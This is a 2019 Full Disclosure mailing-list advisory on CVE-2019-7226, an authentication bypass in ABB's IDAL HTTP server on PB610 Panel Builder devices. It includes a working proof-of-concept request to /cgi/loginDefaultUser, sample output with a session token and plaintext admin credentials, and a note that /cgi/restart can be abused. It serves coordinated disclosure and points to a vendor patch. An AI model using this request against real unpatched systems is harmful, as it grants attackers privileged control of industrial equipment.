[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
From:       xen1thLabs <xen1thLabs () darkmatter ! ae>
Date:       2019-06-20 12:13:19
Message-ID: 8d318fa8cd3c4cb78aab8ef00df89833 () darkmatter ! ae
[Download RAW message or body]

XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
========================================================================

Identifiers
-----------
XL-19-010
CVE-2019-7226
ABBVU-IAMF-1902005


CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


Affected vendor
---------------
ABB (new.abb.com)


Credit
------
Eldar Marcussen - xen1thLabs - Software Labs


Vulnerability summary
---------------------
The IDAL HTTP server CGI interface contains a URL, which allows an unauthenticated attacker to \
bypass authentication and gain access to privileged functions.


Technical details
-----------------
In the IDAL CGI interface, there is a URL (/cgi/loginDefaultUser), which will create a session \
in an authenticated state and return the session ID along with the username and plaintext \
password of the user. An attacker can then login with the provided credentials or supply the \
string 'IDALToken=......' in a cookie which will allow them to perform privileged operations \
such as restarting the service with /cgi/restart.

Proof of concept
----------------
```
GET http://localhost:81/cgi/loginDefaultUser
````

    1
    #S_OK
    IDALToken=532c8632b86694f0232a68a0897a145c
    admin
    adminpass

Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367


Solution
--------
Apply the patches and instructions from vendor:
  - ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch



Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic